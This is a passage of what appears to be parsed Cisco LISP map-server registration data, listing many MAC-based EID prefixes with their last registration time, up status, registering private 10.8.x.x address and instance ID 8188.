"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.29c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.29e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.290a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.294a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.296a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2a89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2aa9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2ac9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2ae9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2a0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2a2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2a4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2a6a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2b89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2bc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2be9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2b0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2b2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2b6a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2c89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2ca9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2cc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2ce9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2c0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2c4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2c6a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2dc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2de9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2ea9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2fc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3089/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.30a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.30c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.302a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.306a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.31a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.312a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.316a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3289/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.32a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.32c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.33c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.330a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.34c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.34e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.340a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.342a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.344a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.346a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.35a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.35c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.35e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.350a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.356a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3689/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.36a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.36c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.360a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.362a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3789/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.37a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.37c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.37e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.370a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.38c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.380a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.384a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3989/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.39a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.39e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.390a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.392a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.396a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3a89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3aa9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3a0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3a4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3b89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3ba9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3be9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3b0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3b2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3b6a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3ce9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3c0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3c2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3c4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3de9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3d0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3e89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3ea9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3ec9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3e4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3fe9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.3f0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4c6a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.502a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.516a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.520a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.524a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.536a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.540a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.562a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.57c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.712a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.72e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.750a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.78c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"3c41.0eff.4073/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"3c41.0eff.577f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"3c41.0eff.57b7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"3c41.0eff.57bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"3c41.0eff.57d3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"3c41.0eff.5c9f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"3c41.0eff.5cb7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"3c41.0eff.5d13/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"3c41.0eff.5ebf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"683b.78ff.ccf9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"683b.78ff.d3ca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"6c71.0dff.1abf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"6c71.0dff.1bd3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"6c71.0dff.1ccb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"6c71.0dff.1e8b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"6c71.0dff.39ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"6c71.0dff.39e3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"6c71.0dff.3ae6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"6c71.0dff.3afe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"6c71.0dff.3a57/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"6c71.0dff.3a5f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"6c71.0dff.3a63/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"6c71.0dff.feb5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"6c71.0dff.1221/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"6c71.0dff.145d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"6c71.0dff.156d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"6c71.0dff.1619/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"7c21.0eff.427f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.8:43876",
"inst_id": 8188,
},
"7c21.0eff.fd0d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60669",
"inst_id": 8188,
},
"a4b2.39ff.4d2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.54c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.54fa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.5e5a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.3c25/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.44c5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.4c85/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.5a85/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.9ae6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.9ca6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.9cc6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.9d86/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.a046/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.a086/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.a0a6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.4dc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.e127/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.f307/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.fb87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.01e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"a4b2.39ff.0bfc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.19f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1905/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.1a08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.1a4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.1a64/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1a68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1a74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.1a88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"a4b2.39ff.1ad8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1a05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.1b28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.1b54/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.1c28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1c30/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8188,
},
"a4b2.39ff.1c3c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1c40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1c58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1c5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.1c60/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1c6c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.1c70/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.1c74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.1c80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1c84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1c90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.1c94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.1c98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.1ca0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.1ca4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.1ca8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.1cac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.1cbc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.1cc0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.1cc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.1cc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.1ccc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1cd4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.1cd8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.1cdc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.1ce0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.1ce4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1ce8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.1cf8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1cfc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1c05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1d08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.1d0c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.1d10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
